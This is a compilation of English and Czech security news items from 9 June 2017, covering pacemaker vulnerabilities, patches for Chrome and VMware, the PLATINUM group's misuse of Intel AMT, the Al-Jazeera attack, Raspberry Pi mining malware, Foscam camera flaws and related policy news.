Nová stránka 4

Thousands of Firms Fail to Update Software on Most Computers: Study

9.6.2017 securityweek Vulnerebility
An analysis of 35,000 companies from more than 20 industries across the world showed that many of them are at risk of suffering a data breach due to their failure to ensure that the software running on their computers is up to date.

The study conducted by cybersecurity ratings company BitSight focused on Apple and Microsoft operating systems, and the Firefox, Chrome, Safari and Internet Explorer web browsers.

The research showed that more than 50 percent of computers in over 2,000 organizations run an outdated version of the operating system, and over 8,500 companies have failed to update Web browsers on more than half of their machines.

Looking at each of the analyzed industries, BitSight found that the education and government sectors had the highest usage rate of outdated operating systems and browsers. Nearly 40 percent of computers used in the education sector and more than 25 percent of devices in the government sector had been running outdated operating systems, particularly outdated versions of Mac OS.

The fact that public sector organizations have done a poor job at protecting their systems is not surprising, and even U.S. President Donald Trump called for government agencies to take measures in his recent cybersecurity executive order.

At the other end of the chart we have the legal and energy sectors, which had the fewest devices running outdated software.

“Given that the Energy sector provides critical infrastructure services, organizations in this sector should maintain their proactive approach to security,” BitSight said in its report. “Despite its top performance, researchers found that more than 120 companies in this sector were running out-of-date or unsupported operating systems and more than 400 companies were observed to have greater than 33 percent of Internet browsers out-of-date. This represents a gap in security and presents an opportunity for hackers to exploit weaknesses in this critical sector.”

Outdated OSs and browsers in each sector

As for how long it takes organizations to apply patches, BitSight determined that it takes most companies, on average, more than a month to update to the latest version of macOS Sierra. Researchers found that in late March, over two months after version 10.12.3 was released, roughly 40 percent of firms had still been using an older version.

In the case of Windows, more than 60 percent of analyzed PCs were running Windows 7 or earlier, including XP and Vista, which no longer receive updates from Microsoft.

Kardiostimulátory mají tisíce chyb, kupte ho na eBay a zkuste hacknout
9.6.2017 Root.cz Zranitelnosti
Nová studie firmy WhiteScope musí vyděsit i ty nejotrlejší kardiaky. V kardiostimulátorech se totiž našly tisíce bezpečnostních děr, a to hned na několika úrovních architektury.
WhiteScope je firma zabývající se bezpečností systémů a auditem kritických infrastruktur. Její nejnovější studie upozorňuje, že čtyři hlavní výrobci kardiostimulátorů používají ve svých zařízeních podobný architekturní rámec včetně komunikačních protokolů, vestavěného hardwaru a principů autentizace. A právě ve všech těchto úrovních se nalézají překvapivé zranitelnosti, kterých autoři studie popsali několik tisíc.

Jak kardiostimulátory fungují?
Na počátku bychom měli říci, jak kardiostimulátory fungují. Zjednodušeně se jedná o drobná zařízení velikosti cca klasické krabičky tictaců, která lékaři implantují pod kůži pacienta. Může se jednat třeba o kardiostimulátor, který srdci pacienta s poruchou srdečního rytmu „udává správný rytmus“. Druhým typem je implatabilní kardioverter-defibrilátor (ICD), který naopak hlídá, jestli se srdce pacienta nezačalo chaoticky stahovat zcela nekoordinovaně (čímž přestalo pumpovat krev do těla), a ve správnou chvíli dá výboj, jenž by měl znovu nastolit srdeční akci.

Přístroj je tedy implantovaný na hrudníku pod kůží pacienta, obsahuje řídicí jednotku, baterii a elektrody vedoucí k srdci.

K tomu, aby lékař mohl přístroj zkontrolovat a případně nastavit správné hodnoty stimulace, nemusí do pacienta řezat. Pro běžné kontroly a pohodlnou administraci slouží externí přístroj – tzv. programmer. Ten se ke kardiostimulátoru připojuje bezdrátově, nejčastěji radiofrekvenčním spojením či indukčně, tj. na krátkou vzdálenost přiložením sondy na hrudník pacienta.

V administračním rozhraní kardiostimulátoru lze nastavovat různé parametry stimulace, zjistit životnost baterie, zkontrolovat správné umístění elektrody v srdci či dokonce testovat, zdali přístroj správně vyhodnotí srdeční rytmus pacienta a zareaguje správně. Správcovské rozhraní umožňuje lékaři simulovat na vstupu různé arytmie a virtuálně sledovat, jak se přístroj zachová.

V zahraničí často bývají zařízení připojena bezdrátově i k domácí monitorovací jednotce, která data odesílá na server a umožňuje tím i vzdálené monitorování pacienta lékařem. V ČR je taková jednotka ale zatím spíše výjimkou.

Bezpečnostní díry
Hned na začátku studie autoří poukazují na lákavou možnost velmi levně pořídit kardiostimulátor na aukčním serveru eBay. Na to, že kardiostimulátor často stojí desítky až stovky tisíc, zde můžete použitý kousek koupit (často i s nahranými citlivými daty předešlého pacienta) v řádu jednotek tisíc, což je docela dobrý obchod.

WhiteScope.io
Natvrdo naprogramovaný přístup na server
Samozřejmostí a evergreenem je již zdrojový kód obsahující natvrdo naprogramované přístupové údaje do administračního rozhraní. Stejná potíž sužuje i ostatní zdravotnické přístroje, jak jsme již na Rootu psali.

WhiteScope.io
Ukázka natvrdo naprogramovaného hesla
Pokud si útočník sežene na internetu použitý kardiostimulátor, může se šroubovákem dopídit i jednotlivých komponent přístroje. Jednotlivé mikroprocesory a další součástky bývají podle sériových čísel dohledatelné na internetu, čísla na integrovaných obvodech umožňují zjistit ovládací signály a kódy, což autoři studie dokládají několika odkazy na velmi podrobné informace o architektuře konkrétních mikroprocesorů (např. MC9328MX21). Datové listy pak usnadní nalezení „správné cesty“ pro útočníkovo reverzní inženýrství.

Další nepříjemně zranitelnou částí je přítomnost debugovacího rozhraní, nejčastěji JTAG či UART. Tato rozhraní pomohou sledování firmwaru a jeho instrukcí, čtení paměťových segmentů a změnám hodnot registru.

Firmware bývá napsán průhledně, bezpečné techniky či šifrování bychom v něm hledali marně. Firmware nebývá digitálně podepsaný, aktualizace nevyžadují ověření zdroje kódu, souborový systém bývá jednoduše dostupný a čitelný. Nemluvě o tom, že data pacienta nebývají zabezpečena a zašifrována. Proto třeba v přístrojích z eBay naleznete pacientské údaje.

WhiteScope.io
Kód a systém souborů kardiostimulátoru
Autoři dokonce zjistili, že firmware často obsahuje i knihovny třetích stran – a to ve starých verzích se bezpečnostními dírami známými již v době výroby kardiostimulátoru. Těchto zranitelností pak u čtyř největších výrobců kardiostimulátorů napočítali několik tisíc.

Kardiostimulátor lze rovněž připojit k jakémukoli zařízení. Žádná autentizace neprobíhá, takže se k přístroji může bez problému připojit lékař s oficiálním přístrojem, domácí monitorovací jednotka i hacker.

Tolik teorie: co realita?
Jednotlivé zranitelnosti v kardiostimulátorech tvoří řetězec, který hackera může vést k úspěšnému útoku. Pokud není kardiostimulátor zprostředkovaně připojen k síti (přes domácí monitorovací jednotku, bluetooth, apod.), tak je dostupný jen na kratší vzdálenost zhruba do deseti metrů.

Na tuto vzdálenost se již několika lidem podařilo proniknout do administračního rozhraní kardiostimulátoru a buď vybít baterii nepřiměřenou komunikací s přístrojem, nebo přenastavit hodnoty kardiostimulace (což pacienta může ohrozit na životě při arytmii) či dokonce (u přístrojů ICD) nabít kondezátory a vyslat smrtící výboj přímo na místě.

Někdejší americký viceprezident Dick Chenney si nechal bezdrátové rozhraní svého kardiostimulátoru vypnout kvůli obavám z atentátu.

Kardiostimulátory připojené do sítě třeba díky domácí monitorovací jednotce jsou samozřejmě zranitelné i na mnohem větší, teoreticky neomezené, vzdálenosti. Jak jsem psal na začátku, takových přístrojů je v ČR zatím minimum.

Kardiostimulátorům se do své tragické smrti věnoval Barnaby Jack, novozélandský white-hat hacker. Marie Moe je již dlouhodobě známá bezpečnostní expertka. Ve svém relativně mladém věku musela dostat kardiostimulátor a tehdy se začala zajímat o jejich zabezpečení. Za bezpečnost kardiostimulátorů tvrdě bojuje a opakovaně vystupuje s morálně i emocionálně děsivými přednáškami na různých konferencích (TEDxVicenza, 32C3, Lerchendal Conference).

Zatím jsou známy spíše studie a testy různých odborníků, tvrdý útok na pacienta s kardiostimulátorem snad ještě popsán nebyl. Nicméně musíme přiznat, že dveře jsou útočníkům zatím doširoka otevřené.

Celou studii si můžete přečíst na blogu WhiteScope.

Google odstranil na 30 chyb v prohlížeči Chrome

9.6.2017 Novinky/Bezpečnost Zranitelnosti
Na třicet bezpečnostních děr v internetovém prohlížeči Chrome řeší nová verze tohoto prohlížeče, kterou tento týden uvolnila společnost Google. Chrome 59, jak se tato verze nazývá, zároveň vylepšuje některé funkce.
Při vyhledávání zranitelností Google využil skupinu externích spolupracovníků, jimž podle závažnosti odhalených bezpečnostních děr vyplácí různě vysoké odměny. V tomto případě šlo souhrnně o více než 23 tisíc dolarů (téměř 600 tisíc korun).

Nejzávažnější zjištěná zranitelnost Chrome, již v polovině května odhalili Zhao Qixunem a SørryMybadem z týmu Qihoo 360 Vulcan, se týkala V8 JavaScript jádra. Google za její odhalení vyplatil 7500 dolarů, informoval server SecurityWeek.com.

Po třech tisících dolarů si rozdělili vývojáři Choongwoo Han a Rayyan Bijoora za popsání bezpečnostních děr u hlášení chybových stránek. Nižší odměny vyplatil Google za chyby středního a nízkého stupně závažnosti, jež lze jednoduše napravit a nepředstavují tak velké bezpečnostní riziko.

Google zvyšuje odměny hledačům chyb
Od spuštění programu odhalování bezpečnostních chyb Chrome v roce 2010 vyplatil Google celkem již přes devět miliónů dolarů (téměř čtvrt miliardy korun) za pomoc externím spolupracovníkům při vyhledávání těchto slabých míst. Jenom v loňském roce šlo o více než tři milióny dolarů (75 miliónů korun). Vzhledem k tomu, že vyhledávání zranitelností je stále obtížnější, rozhodla se firma zvýšit odměny za poskytnutí informací o kritických chybách v jejím internetovém prohlížeči.

„Aktivita Google je chvályhodná, protože bezpečnostní chyby v internetových prohlížečích bývají jednou z hlavních cest, kudy se k uživatelům dostávají různé škodlivé kódy,“ říká Václav Zubr, bezpečnostní expert společnosti ESET. „V dnešní době se nové verze známých webových prohlížečů stahují na pozadí automaticky. Ze strany uživatele je nutné pouze restartovat prohlížeč. S tím by lidé neměli otálet, mohou tak předejít různým nepříjemnostem a překvapením.“

Aktualizace prohlížeče i používaného softwaru společně s používáním kvalitního antivirového programu patří podle Zubra k základním pravidlům bezpečného používání internetu.

VMware Patches Flaws in Horizon, vSphere Products

9.6.2017 securityweek Vulnerebility
Updates released by VMware this week for its Horizon View Client and vSphere Data Protection (VDP) products address a total of three critical and important vulnerabilities.

One of the advisories published by the company informs users that VDP versions 5.5.x, 5.8.x, 6.0.x and 6.1.x are affected by two critical Java deserialization and credentials management flaws.

The deserialization issue, tracked as CVE-2017-4914, was reported to VMware by Tim Roberts, Arthur Chilipweli and Kelly Correll of NTT Security. According to the vendor, the flaw can be exploited remotely to execute arbitrary commands on vulnerable appliances.

The second vulnerability affecting VDP is CVE-2017-4917 and it was reported to VMware by Marc Ströbel (aka phroxvs) from HvS-Consulting. Ströbel discovered that the locally stored vCenter Server credentials are poorly encrypted, allowing an attacker to obtain the information in plaintext.

Users of the affected product have been advised to update their installations to versions 6.0.5 or 6.1.4. It’s also worth noting that VMware recently announced its intention to discontinue the VDP product.

A second advisory published by VMware this week describes an important command injection vulnerability affecting the VMware Horizon View Client for Mac.

Florian Bogner of Kapsch BusinessCom AG discovered that the application has a command injection flaw in the service status script. An unprivileged user can exploit the vulnerability to escalate privileges to root on the vulnerable Mac OS X system, VMware said.

The flaw, tracked as CVE-2017-4918, affects View Client versions 2.x, 3.x and 4.x and it has been patched with the release of version 4.5.

According to VMware, workarounds or mitigations are not available for any of the vulnerabilities fixed this week. US-CERT has also published an alert advising users to review the advisories and apply necessary updates.

While some vulnerabilities in VMware products are less likely to be exploited, there are cases where the risk of exploitation is higher. For example, VMware determined recently that several of its products were affected by an Apache Struts 2 flaw that had been exploited in the wild. The company also released patches recently for Workstation vulnerabilities exploited at the 2017 Pwn2Own hacking competition.

Platinum hackers leverages Intel Active Management tools to bypass Windows firewall
9.6.2017 securityaffairs Cyber
The PLATINUM hacker group has developed a system leveraging Intel Active Management Technology (AMT) to bypass the Windows firewall.
Microsoft is warning users of a new attack that leverage Intel’s Active Management Technology to to evade firewalls and other endpoint-based network monitoring.

The technique has been already used by a threat actor in Southeast Asia dubbed PLATINUM, it could be exploited only if the attackers gain administrative credentials.

“Since the 2016 publication, Microsoft has come across an evolution of PLATINUM’s file-transfer tool, one that uses the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication.” reads a security advisory published by Microsoft. “This channel works independently of the operating system (OS), rendering any communication over it invisible to firewall and network monitoring applications running on the host device. Until this incident, no malware had been discovered misusing the AMT SOL feature for communication.”

Attackers developed a system that uses a variant of 2016’s Platinum file transfer tool for sending malicious payloads to run inside the target network bypassing defense measures.

The PLATINUM attack leverages Intel’s Active Management Technology (AMT) to bypass the built-in Windows firewall. The AMT firmware allows attackers to run their code at a low-level below the operating system bypassing any check and accessing the host resources, including the processor and the network interface.

“Upon discovery of this unique file-transfer tool, Microsoft shared information with Intel, and the two companies collaborated to analyze and better understand the purpose and implementation of the tool. We confirmed that the tool did not expose vulnerabilities in the management technology itself, but rather misused AMT SOL within target networks that have already been compromised to keep communication stealthy and evade security applications.” continues Micorsoft.

“The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia—PLATINUM is known to customize tools based on the network architecture of targeted organizations. The diagram below represents the file-transfer tool’s updated channel and network flow.”

Attackers misuse the AMT’s Serial-over-LAN (SOL) feature, it’s independent of the host operating system and allow communication over the LAN if a physical connection exists, regardless of whether networking is enabled on the target.

Another feature of interest for attackers is that the embedded processor is designed to provide remote out-of-band capabilities including an IP-based KVM (keyboard/video/mouse) solution, The KVM solution enables a remote user to send mouse and keyboard input to a machine and see what’s on its display.

“The AMT SOL feature is not enabled by default and requires administrator privileges to provision for usage on workstations. It is currently unknown if PLATINUM was able to provision workstations to use the feature or piggyback on a previously enabled workstation management feature. In either case, PLATINUM would need to have gained administrative privileges on targeted systems prior to the feature’s misuse.” continues Microsoft.

Platinum attack amt_component_stack

Summarizing the Platinum group has devised a method then exploited SOL to transfer malware over the LAN and the process is totally transparent to the operating system.

Microsoft worked with Intel to analyze the Platinum variant and confirmed that Windows Defender ATP can detect the attack.

“The PLATINUM tool is, to our knowledge, the first malware sample observed to misuse chipset features in this way. While the technique used here by PLATINUM is OS independent, Windows Defender ATP can detect and notify network administrators of attempts to leverage the AMT SOL communication channel for unauthorized activity, specifically when used against a computer running Windows.” concludes Microsoft.

Al-Jazeera claims to be facing a large-scale cyber attack due to Qatar crisis
9.6.2017 securityaffairs CyberWar
Al-Jazeera claims to be the victim of a large-scale cyber attack as Qatar crisis continues. The attack comes after the hack of the state news service.
The Qatar-based broadcaster Al-Jazeera announced all its systems were under a large-scale cyber attack. The news was spread in a statement released on social media by the broadcaster.

Media reported that some viewers in the region were not able to receive the signal of the Al-Jazeera television.

Al Jazeera English ✔ @AJEnglish
BREAKING: Al Jazeera Media Network under cyber attack on all systems, websites & social media platforms. More soon: http://aljazeera.com
6:43 PM - 8 Jun 2017
4,742 4,742 Retweets 1,766 1,766 likes
Twitter Ads info and privacy
According to a source at Al-Jazeera, the broadcaster was attempting to mitigate the hack.

“An attempt has been made, and we are trying to battle it,” said the source.

The cyber attack comes while in the Gulf area winds of crisis are blowing after the recent hack of the Qatar’s state-run news agency. Qatar hack is sparking diplomatic tensions in the Gulf, Saudi Arabia, the United Arab Emirates, Egypt and Bahrain cut ties to the country.

al-jazeera cyber-attack

The states are accusing Qatar of financing of extremist groups and its ties to Iran, Saudi Arabia’s local opponents.

Qatar asked help to the FBI who is investigating the hack, US intelligence believes Russian hackers were involved in the cyber attacks and disinformation campaign against the state.

Nebezpečné chyby ve Windows ohrožují milióny uživatelů

9.6.2017 Novinky/Bezpečnost Zranitelnosti
Český Národní bezpečnostní tým CSIRT.CZ varoval před několika chybami, které se týkají různých verzí operačního systému Windows. Zneužít je mohou počítačoví piráti k tomu, aby propašovali libovolný virus do cizího počítače. Podle nejstřízlivějších odhadů tyto trhliny ohrožují milióny uživatelů z různých koutů světa.
Hned na úvod je nutné zdůraznit, že americký Microsoft již pro objevené chyby vydal mimořádné bezpečnostní záplaty. Uživatelé se tedy mohou relativně snadno bránit.

Podle serveru Bleeping Computer však celá řada uživatelů instalaci aktualizací podceňuje, a tak se počet nezáplatovaných strojů relativně snadno vyšplhal až na několik miliónů. Právě takové stroje – tedy ty, které nemají nainstalované aktualizace – dávají jejich majitelé všanc počítačovým pirátům.

Windows Defender i Exchange Server
„Mimořádná aktualizace opravuje řadu chyb v tzv. Microsoft Protection Engine, který je obsažen například ve Windows Defenderu či Exchange Serveru,“ přiblížil Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Jak je z řádků výše zřejmé, chyba tedy není obsažena přímo v operačním systému Windows. Vzhledem k tomu, že zmiňovaný antivirový program Defender je nedílnou součástí Windows 8 a 10, týká se bezpečnostní riziko uživatelů obou zmiňovaných verzí operačního systému od Microsoftu.

Všechny chyby mají nálepku kritické, mohou je tedy snadno zneužít počítačoví piráti. „Pět z nich umožňovalo útok typu DoS a další z nich pak vzdálené spuštění libovolného kódu,“ doplnil Bašta.

S instalací aktualizace neotálet
Při útoku typu DoS mohou počítačoví piráti vyřadit některé služby, které na počítači uživatel využívá. Daleko větší riziko však představuje možnost vzdáleného spuštění programů – touto cestou totiž mohou kyberzločinci do napadeného stroje propašovat prakticky libovolný škodlivý kód.

S instalací aktualizací by tak uživatelé neměli v žádném případě otálet. K dispozici jsou prostřednictvím služby Windows Update, která je nedílnou součástí operačního systému Windows.

Lidé, kteří využívají automatické aktualizace, se nemusí o nic starat.

Dohoda je uzavřena. Microsoft koupí bezpečnostní společnost Hexadite

9.6.2017 Novinky/Bezpečnost IT
Společnost Microsoft ve čtvrtek oficiálně oznámila, že se dohodla na převzetí americko-izraelské společnosti Hexadite působící v oblasti kybernetické bezpečnosti. Informovala o tom agentura Reuters.
Internetové stránky společnosti Hexadite
Ani jeden z podniků zatím nekomentoval finanční podmínky celé transakce. Podle dřívějších informací izraelského finančního serveru Calcalist nicméně americký softwarový gigant za Hexadite zaplatí 100 miliónů dolarů (2,34 miliardy Kč).

Společnost Hexadite má ústředí v Bostonu a její výzkumné a vývojové centrum se nachází v Izraeli. Firma poskytuje technologie pro automatickou reakci na kybernetické útoky. K investorům do Hexadite patří Hewlett Packard Ventures či kapitálové společnosti TenEleven a YL Ventures.

Výkonný viceprezident sekce pro zařízení a operační systém Windows Terry Myerson podle agentury prohlásil, že díky této akvizici Microsoft získá nové nástroje a služby do své nabídky bezpečnostních řešení.

Strašák jménem WannaCry
Kybernetická rizika minulý měsíc připomněl rozsáhlý útok nového vyděračského programu WannaCry. Vir, který zašifruje soubory na počítači a bez zaplacení výkupného je neuvolní, infikoval odhadem na 300 000 počítačů ve 150 zemích světa. Útok vedl k nárůstu cen akcií firem zaměřených na kybernetickou bezpečnost.

WannaCry – první i vylepšená druhá generace – útočí úplně stejně jako ostatní vyděračské viry, které jsou označovány souhrnným názvem ransomware. Nejprve tedy škodlivý kód pronikne do počítače, pak jej uzamkne a zašifruje všechna data. Za jejich zpřístupnění následně počítačoví piráti požadují výkupné.

Je však nutné zdůraznit, že ani po zaplacení výkupného uživatelé nemají jistotu, že se k datům dostanou.

Microsoft je největším výrobcem softwaru na světě a jeho operační systém Windows využívá většina osobních počítačů. Společnost v lednu oznámila, že hodlá v příštích letech do výzkumu a vývoje v oblasti kybernetické bezpečnosti nadále investovat více než miliardu dolarů (zhruba 24 miliard Kč) ročně.

Experts, Microsoft Push for Global NGO to Expose Hackers

9.6.2017 securityweek CyberWar
As cyberattacks sow ever greater chaos worldwide, IT titan Microsoft and independent experts are pushing for a new global NGO tasked with the tricky job of unmasking the hackers behind them.

Dubbed the "Global Cyber Attribution Consortium", according to a recent report by the Rand Corporation think-tank, the NGO would probe major cyberattacks and publish, when possible, the identities of their perpetrators, whether they be criminals, global hacker networks or states.

"This is something that we don't have today: a trusted international organization for cyber-attribution," Paul Nicholas, director of Microsoft's Global Security Strategy, told NATO's Cycon cybersecurity conference in Tallinn last week.

With state and private companies having "skills and technologies scattered around the globe" Nicholas admits it becomes "really difficult when you have certain types of complex international offensives occurring."

"The main actors look at each other and they sort of know who they think it was, but nobody wants to make an affirmation."

Microsoft already floated the idea of an anti-hacking NGO in a June 2016 report that urged the adoption of international standards on cybersecurity.

The report by Rand commissioned by Microsoft called "Stateless Attribution - Toward international accountability in Cyberspace" analyzes a string of major cyberattacks.

They include offensives on Ukraine's electricity grid, the Stuxnet virus that ravaged an Iranian nuclear facility, the theft of tens of millions of confidential files from the US Office of Personnel Management (OPM) or the notorious WannaCry ransomware virus.

- Duping investigators -

"In the absence of credible institutional mechanisms to contain hazards in cyberspace, there are risks that an incident could threaten international peace and the global economy," the report's authors conclude.

They recommend the creation of an NGO bringing together independent experts and computer scientists that specifically excludes state actors, who could be bound by policy or politics to conceal their methods and sources.

Rand experts suggest funding for the consortium could come from international philanthropic organisations, institutions like the United Nations, or major computer or telecommunications firms.

Pinning down the identity of hackers in cyberspace can be next to impossible, according to experts who attended Cycon.

"There are ways to refurbish an attack in a way that 98 percent of the digital traces point to someone else," Sandro Gaycken, founder and director of the Digital Society Institute at ESMT Berlin, told AFP in Tallinn.

"There is a strong interest from criminals to look like nation-states, a strong interest from nation-states to look like criminals," he said.

"It's quite easy to make your attack look like it comes from North Korea."

According to experts at Cycon, hackers need only include three lines of code in Cyrillic script in a virus in order to make investigators wrongly believe it came from Russian hackers.

Similarly, launching attacks during working hours in China raises suspicions about Chinese involvement.

Hackers can also cover their tracks by copying and pasting bits and pieces of well known Trojan viruses, something that points the finger at their original authors.

Linux Malware Targets Raspberry Pi for Cryptocurrency Mining

9.6.2017 securityweek Virus
Researchers at Russian antivirus firm Dr. Web have come across a couple of new Linux Trojans, including one that abuses Raspberry Pi computers for cryptocurrency mining.

The malware, tracked by the company as Linux.MulDrop.14, has been described as a script that contains a compressed and encrypted cryptocurrency miner.

The Trojan attempts to connect to a device via SSH using the default credentials – the username “pi” and the password “raspberry.” If the device is successfully infected, the miner is unpacked and executed. The Trojan then changes the device’s password and starts looking for other Raspberry Pi computers it can connect to via SSH over port 22.

MulDrop, which researchers first spotted in mid-May, uses the ZMap scanner to search for other victims, and the sshpass utility to connect to them. The process for attempting to infect other devices takes place in an infinite loop, Dr. Web said.

An update released in November 2016 for the Raspbian operating system disables the SSH server by default. Users who have SSH enabled on their Raspberry Pi have been advised to change their default password to prevent attacks.

Raspberry Pi devices have been targeted by malware in the past. Symantec reported last year that Internet of Things (IoT) malware that abused infected devices for distributed denial-of-service (DDoS) attacks had also targeted Raspberry Pis.

Another Linux Trojan discovered recently by Dr. Web is Linux.ProxyM, which has been around since February. The number of ProxyM attacks peaked in late May with roughly 10,000 attempts per day. Nearly one-third of the attacks were traced to Russia, and other offending IPs were linked to China (13%), Taiwan (10%) and Brazil (9%).

ProxyM has been used by malicious actors to cover their tracks online. Once it infects a Linux device, the Trojan uses various methods to detect honeypots. If a honeypot is not detected, the malware contacts a command and control (C&C) server and initiates a SOCKS proxy server on the compromised machine.

Qatar's Al-Jazeera Says Battling Cyber Attack

9.6.2017 securityweek CyberWar
Qatar-based broadcaster Al-Jazeera said Thursday that it was under a widescale cyber attack which had targeted "all systems", according to a statement released on social media by the broadcaster.

"Al Jazeera Media Network under cyber attack on all systems, websites & social media platforms," it said on Twitter.

The attack was also confirmed by a source at Al-Jazeera, who said the broadcaster was attempting to repel the hack.

"An attempt has been made, and we are trying to battle it," said the source.

Following the initial reports of a cyber attack, some viewers in the region said they could no longer receive Al-Jazeera television.

Al-Jazeera, one of the largest news organisations in the world, has long been a source of conflict between Qatar and its neighbours, who accuse the broadcaster of bias and fomenting trouble in the region.

The alleged cyber attack comes during a time of heightened tensions in the Gulf, which has seen Saudi Arabia, the United Arab Emirates, Egypt, Bahrain and other allies cut ties with Qatar.

They severed relations over what they said is Doha's alleged financing of extremist groups and its ties to Iran, Saudi Arabia's regional arch-rival.

Long-running tensions broke out into the open last month after Qatar claimed its state news site was hacked by unknown parties who posted "false" statements attributed to the emir in which he speaks favorably of Iran and the Palestinian Islamist group Hamas.

The remarks were widely reported as true across the region.

Earlier this month, Qatar said the FBI was helping it investigate the source of the alleged hacking.

Subsequently there were a media report suggesting that Qatar had been targeted by Russian hackers -- a claim dismissed by Moscow.

F-Secure experts found multiple flaws in popular Chinese Internet-connected cameras
9.6.2017 securityaffairs Vulnerebility

Experts at F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam.
Security experts at security firm F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam.

The flaws could be exploited by attackers to take over the Internet-connected cameras, upload and download files from the built-in FTP server, and view video feeds. The devices could be used as an entry point into the target network.

The experts discovered 18 vulnerabilities in two differed camera models available on the market under the brands Foscam C2 and Opticam i5 HD. In both cases, the vulnerabilities are still unpatched despite F-Secure reported the issues to the manufacture several months ago.

“F-Secure’s discovery of multiple flaws in two models of Foscam-made IP cameras is another example of a poorly engineered device that offers attackers an easy target. Should an attacker infiltrate the company network and find such a device, they could infect it with malware that would not only fully compromise the device, but also grant free reign inside the network, including access to network systems and resources.” states the report published by F-Secure.

“Foscam-made IP cameras have multiple vulnerabilities that can lead to full device compromise,” continues the report.“An unauthenticated attacker can persistently compromise these cameras by employing a number of different methods leading to full loss of confidentiality, integrity and availability, depending on the actions of the attacker.”

The experts believe that the same issues may affect 14 other brands that use Foscam internals, including Chacon, 7links, Netis, Turbox, Thomson, Novodio, Nexxt, Ambientcam, Technaxx, Qcam, Ivue, Ebode and Sab.

Foscam Internet-connected cameras

The vulnerabilities discovered by the experts in the two models of Internet-connected cameras includes:

Insecure default credentials
Hard-coded credentials
Hidden and undocumented Telnet functionality
Remote Command Injections
Incorrect permissions assigned to programming scripts
Firewall leaking details about the validity of credentials
Persistent cross-site scripting
Stack-based Buffer overflow attack
vulnerable Internet-connected cameras map_smaller
Experts highlighted that even if the users change the default credentials of the IP cameras they will remain vulnerable to cyber attacks because Foscan is using hard-coded credentials.

“Credentials that have been hard-coded by the manufacturer cannot be changed by the user. If the password is discovered and published on the internet (which often happens) attackers can gain access to the device. And as all devices have the same password, malware attacks such as worms can easily spread between devices.” reads the report published by F-Secure.

The list of flaws includes a Hidden and undocumented Telnet functionality could help attackers use Telnet to discover “additional vulnerabilities in the device and within the surrounding network.”

The experts reported three flaws that cannot be fixed, including built-in file transfer protocol server that contains an empty password, a hidden telnet function and incorrect permissions assigned to programming scripts, could be exploited by remote hackers to gain persistent access to the Internet-connected cameras.

“The empty password on the FTP user account can be used to log in. The hidden Telnet functionality can then be activated. After this, the attacker can access the world-writable (non-restricted) file that controls which programs run on boot, and the attacker may add his own to the list,” F-Secure researchers says.

“This allows the attacker persistent access, even if the device is rebooted. In fact, the attack requires the device to be rebooted, but there is a way to force a reboot as well.”

F-Secure experts suggest users who are running one of these IP cameras to avoid exposing them on the Internet and of course to change default credentials.

Comey hearing: Former FBI director talks about Russia interference in US Presidential Election
9.6.2017 securityaffairs BigBrothers

Former FBI Director Comey hearing: Comey Has ‘No Doubt’ on the Russia’s Involvement in cyber attacks against 2016 US Presidential Election.
James Comey today testified before the Senate Intelligence Committee that he believes that Russia Government is behind the cyber attacks aimed to interfere with the 2016 US election.
Former FBI Director James Comey today declared he has “no doubt” about the involvement of the Russian government in the cyber attacks against the Hillary Clinton’s presidential campaign and the Democratic Party.

Comey hearing

When Sen. Richard Burr (R-NC) posed the question, “Do you have any doubt that the Russian government was behind the intrusions” of the email accounts, Comey replied: “No, no doubt,” reported the Washington Post.

Comey also added that there is no indication of alleged tampering of the ballots.

“I’d seen no indication of that whatsoever” before he was dismissed last month, Comey added.

According to The Washington Post, Comey also said that President Trump never asked him to abandon the investigation nor that any government official asked him to cover up the case and suspend the investigation.

“No,” he told Burr.
Former FBI Director James B. Comey explained he was surprised by the Trump’s behavior that has always appreciated his work at the Bureau.

Comey was surprised to hear Trump saying that he fired the Director while thinking about Russia.

“Comey also said he was surprised to hear the White House claim he was dismissed for his handling of the Hillary Clinton email probe.” states the Washington Post.

“The administration then chose to defame me and more importantly the FBI by saying that the organization was in disarray,” Comey said. “That it was poorly led. That the workforce had lost confidence in its leader. Those were lies, plain and simple.”

When asked why President Trump suddenly fired him last month, Comey explained that Russian investigation may have has a significant role.

“It’s my judgment that I was fired because of the Russia investigation,” Comey said. “I was fired in some way to change, or the endeavor was to change, the way the Russia investigation was being conducted.”
Follow
Washington Post ✔ @washingtonpost
Comey describes being “confused” by firing, “lies” about FBI being in disarray
4:25 PM - 8 Jun 2017
792 792 Retweets 1,750 1,750 likes
Twitter Ads info and privacy
Comey said he was ‘defamed’ by President Trump and White House.
“The administration then chose to defame me and more importantly the FBI by saying that the organization was in disarray, that it was poorly led,” Comey said. “Those were lies, plain and simple. And I’m so sorry that the FBI workforce had to hear them, and I’m so sorry the American people were told them.’”

iOS 11 znamená konec podpory iPhonu 5 a 5C

9.6.2017 SecurityWorld Apple
Připravovaný operační systém iOS 11 nebude kompatibilní s iPhonem 5, respektive 5C ani s iPadem 4. Majitelé starších zařízení tak už nebudou dostávat softwarové ani bezpečnostní aktualizace.

Ty budou určeny pro modely od iPhonu 5S a novější, ačkoliv některé starší aplikace už na nich pod iOS 11 nebudou fungovat. Jde o důsledek rozhodnutí společnosti ukončit podporu modelů a aplikací využívajících 32 bitové procesory, od kterých Apple přešel na ty 64 bitové v roce 2013, kdy představil iPhone 5S a iPad Air.

Současně aplikace, které běží pouze ve 32 bitovém prostředí, se přestanou zobrazovat mezi výsledky vyhledávání v nové verzi App Storu ani nebudou dostupné mezi pořízenými, jestliže už byly v minulosti staženy.

„Apple na přechod na 64bitový hardware upozorňuje už roky, přesto tato novinka spoustu zákazníků jistě vyvede z míry,“ říká Ernest Doku ze srovnávače uSwitch.com. „Většina aplikací, které nejsou starší než zhruba čtyři roky, by ale měla být použitelná.“

Ostatně, chod 32bitových aplikací byl problematický už v rámci iOS 10.1, uvedeného loni v říjnu, systém v takovém případě uživatele upozornil, že aplikace může jejich zařízení zpomalit. Aktualizovaný iOS 10.3 později obsahoval nástroj na detekci aplikací, které v 64bitovém módu nemohou být spuštěny.

Od června 2015 pak musejí všechny nové aplikace nebo aktualizace existujících aplikací fungovat v 64bitovém prostředí.

